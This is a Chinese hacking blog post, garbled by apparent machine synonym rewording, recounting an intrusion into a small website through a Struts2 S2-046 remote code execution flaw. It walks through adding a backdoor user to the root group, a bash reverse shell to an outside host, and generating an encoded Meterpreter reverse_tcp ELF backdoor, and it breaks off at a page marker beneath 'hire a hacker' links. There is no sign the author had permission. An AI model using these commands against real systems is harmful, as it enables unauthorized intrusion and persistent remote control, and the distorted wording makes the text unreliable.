当Strust2遇到防火墙,你的思路够骚吗?

访客5年前黑客文章1181

一、布景
偶尔碰到一个小站存在st2-046代码长途履行缝隙,心里乐滋滋。

履行whoami检查自己是什么权限

现已是root了,就测验上传一个webshell
可是却提示上传失利,页面不存在
上传txt显现成功


通过测验,服务器装有一些防火墙之类的东西或者是安全策略,只需上传的文件里包括可履行代码就上传失利
可是转念一想我为什么非要传webshell,传上去之后不仍是要提权,弄到他的ssh权限。
所以镇定考虑了一下现在的局势:
1  root权限
2 能够履行非交互性指令
3 不能上传文件
脑海里一道闪电,蹦出来三个思路
1 直接长途履行指令 增加一个用户 然后参加root组
2  nc反弹shell 进行交互性指令 设置用密钥登陆
3 用神器msf生成一个linux后门,进一步拿下ssh
二、一波操作猛如虎
思路一
首要useradd test增加一个名为test的用户

由于不能交互 所以无法运用passwd 指令
测验echo “PASSWORD” | passwd  –stdin USERNAME指令

指令履行完结
然后参加root组
usermod -g root test

用id+用户名检查是否增加成功

奈斯
然后便是高高兴兴去衔接ssh

成果他一向回绝我的暗码。。。
这是什么操作。。。
得到了你的人得不到你的心吗。。。
其时也不明白为什么会这样
后来百度查了一下
才知道这个指令有时候是有问题的

思路一失利
思路二
已然问题出在加暗码的指令上面,我就只需把shell反弹出来然后再运用passwd指令即可
测验了一下方针站不支持其他脚本,也没有nc,就直接用bash转发吧
先打开一台外网windows服务器,敞开nc监听
指令为nc.exe –vv –l –p 端口

 Linux上bash转发指令如下
bash -i >& /dev/tcp/x.x.x.x/2333 0>&1

提示履行成功
可是windows服务器上并没有收到任何反弹信息
换端口换反弹 *** 都失利
用脚趾头想想应该是防火墙的问题
思路二失利。
思路三
前两次均失利,心里很难受了
不过不要紧,咱们还有神器msf
假定本机ip为192.168.250.162监听端口为8090
用msf生成一个linux的后门指令如下:
(1)关于metasploit 4.2版别,运用msfpayload生成后门程序,运用msfencode对后门进行二次编码防杀。
生成后门并运用msfencode shikata_ga_nai编码程序对后门程序再编码。
指令:
msfpayloadlinux/x86/meterpreter/reverse_tcp LHOST=192.168.250.162 LPORT=8090 R |msfencode -t elf -e x86/shikata_ga_nai -c 3 -o /root/test
详解:
运用模块 linux/x86/meterpreter/reverse_tcp  能够实现在32位linux体系上反弹TCP会话
LHOST=192.168.250.162   反弹衔接到metasploit进犯主机的IP地址
LPORT=8090  反弹衔接到metasploit进犯主机的TCP端口号
-t elf 编码生成的文件类型
-e x86/shikata_ga_nai  运用的编码 ***
-c 3 重复封装编码3次
-o /root/test 输出后门文件到/root目录下,文件名test
(2)在较新版别的metasploit中,msfpayload和msfencode现已被撤销,功用合并为msfvenom
运用msfvenom创立后门到达相同作用的指令为:

[1] [2]  黑客接单网

相关文章

赌博时我赚了还想赚更多是贪,可赔了之后只想把赔

After=network.target remote-fs.target nss-lookup.target ctx.NotFound("", nil)/models/repo_mirror.go远...

软件编程入门自学_找黑客总是碰到骗子-用黑客方法找手机

-k keyfile (specify tsig key file) the target's DNS server for all additional queries by default....

浅谈SQL盲注测验办法解析与技巧

本文一切实战盲注比如,均来自Joomla! 3.7.0 – ‘com_fields’ SQL Injection。 因为篇幅有限,本文就不去分析缝隙原理,直接奉告payload刺进点,来展示盲注的用法...

海外邮箱_找黑客手机帮忙-中国黑客联盟

第1步:依据主机A上的路由表内容,IP确认用于拜访主机B的转发IP地址是192.168.1.2。 然后A主机在自己的本地ARP缓存中检查主机B的匹配MAC地址。 0x01 一个waf的绕过进程}# G...

广州大学教务管理,问道黑客的联系方式,如何找靠谱黑客

Burp Suite是一个强壮的Web进犯归纳渠道,其运用也比较复杂,这儿首要用到它的抓包功用。 Burp Suite要根据Java环境运转,因此还需要在黑客主机中装置Java。 import jav...

同源战略详解及绕过

浏览器有一个很重要的概念——同源战略(Same-Origin Policy)。所谓同源是指,域名,协议,端口相同。不同源的客户端脚本(javascript、ActionScript)在没清晰授权的情况...